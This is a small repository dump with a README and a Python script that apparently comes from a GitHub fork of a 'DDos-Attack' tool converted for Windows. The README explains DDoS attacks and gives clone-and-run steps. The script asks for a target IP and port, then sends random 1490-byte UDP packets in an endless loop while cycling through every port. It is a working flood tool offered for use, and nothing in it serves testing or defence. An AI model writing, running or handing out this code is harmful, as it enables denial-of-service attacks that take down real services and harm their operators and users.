├── README.md └── ddos-attack.py /README.md: -------------------------------------------------------------------------------- 1 | 2 | # DDos-Attack 3 | 4 | ## Python 3 Version 5 | ## Windows 10 Version 6 | 7 | ### What Is A DDos-Attack 8 | 9 | ### A Distributed Denial of Service (DDoS) attack is an attempt to make an online service unavailable 10 | by overwhelming it with traffic from multiple sources. They target a wide variety of important resources 11 | from banks to news websites, and present a major challenge to making sure people can publish and access important information 12 | 13 | ### forked from https://github.com/Ha3MrX/DDos-Attack 14 | 15 | ### Dwonload&Install 16 | 17 | ### git clone https://github.com/UltraHackerDog/DDos-Attack-Python3-Windows 18 | 19 | ### cd DDos-Attack-Python3-Windows 20 | 21 | ### python ddos-attack.py 22 | 23 | ### ScreenShot 24 | 25 | ![github](https://user-images.githubusercontent.com/69469132/134326554-274b415d-77d9-4987-b8e0-189167208b0b.png) 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /ddos-attack.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | import time 4 | import socket 5 | import random 6 | #Code Time 7 | from datetime import datetime 8 | now = datetime.now() 9 | hour = now.hour 10 | minute = now.minute 11 | day = now.day 12 | month = now.month 13 | year = now.year 14 | 15 | ############## 16 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 17 | bytes = random._urandom(1490) 18 | ############# 19 | 20 | os.system("cls") 21 | print ("Author : HA-MRX") 22 | print("Converted to Windows and Python3 by UltraHackerDog") 23 | print ("Author Github : https://github.com/Ha3MrX") 24 | print ("Editor Github : https://github.com/UltraHackerDog") 25 | print("-"*50) 26 | ip = input("IP Target : ") 27 | port = input("Port : ") 28 | port = int(port) 29 | 30 | os.system("cls") 31 | print ("[====================] 100%") 32 | time.sleep(3) 33 | sent = 0 34 | while True: 35 | sock.sendto(bytes, (ip,port)) 36 | sent = sent + 1 37 | port = port + 1 38 | print ("Sent %s packet to %s throught port:%s"%(sent,ip,port)) 39 | if port == 65534: 40 | port = 1 41 | 42 | --------------------------------------------------------------------------------